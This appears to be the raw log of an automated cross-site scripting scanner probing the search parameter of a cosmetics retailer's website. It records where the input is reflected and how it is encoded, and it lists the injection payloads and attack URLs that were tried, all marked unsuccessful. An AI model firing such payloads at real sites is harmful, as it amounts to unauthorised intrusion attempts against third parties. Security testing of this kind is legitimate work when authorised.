https://www.urbandecay.com/aboutudbeautyjunkies

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.urbandecay.com/search?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<ul class="breadcrumb t-test1" data-js-analytics="Home::(uvw&quot;xyz'yxz&lt;/zxy " itemscope itemtype="http://schema.org/BreadcrumbList">

----------------------------------------------------------------------------------
HTML Context: [2]
<span itemprop="name">
&#40;uvw&quot;xyz&#39;yxz&lt;/zxy 
</span>
<span class="no_hits_search_term">
            &#40;uvw&quot;xyz&#39;yxz&lt;/zxy
        </span>

----------------------------------------------------------------------------------
Script Context: [1]
<script type="text/javascript">
	    if('lpTag' in window){
	        lpTag.sdes.push( {"type":"error","error":{"message":"No search results. Query = (uvw\"xyz'yxz</zxy","code":"LPERREMPTYSEARCH"}} );
	    }
    </script>

----------------------------------------------------------------------------------
URI Context: [3]
<a class=" " href="/search?q=%28uvw%22xyz%27yxz%3C%2Fzxy" title="(uvw&quot;xyz'yxz&lt;/zxy" itemprop="item">
<link rel="canonical" href="https://www.urbandecay.com/search?q=%28uvw%22xyz%27yxz%3C%2Fzxy" />
<link rel="alternate" hreflang="x-default" href="https://www.urbandecay.com/search?q=%28uvw%22xyz%27yxz%3C%2Fzxy" />

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.urbandecay.com/search?q=' onmouseover='alert(1)

 ______ UnSuccessful with payload: ' onmouseover='alert(1)

ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	True

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	True

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	False	False

Attack Payloads for SCRIPT
['</script><script>alert(1)</script>']

SCRIPT Attack Url: https://www.urbandecay.com/search?q=</script><script>alert(1)</script>

 ______ UnSuccessful with payload: </script><script>alert(1)</script>

ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	True

Attack Payloads for URL
[]
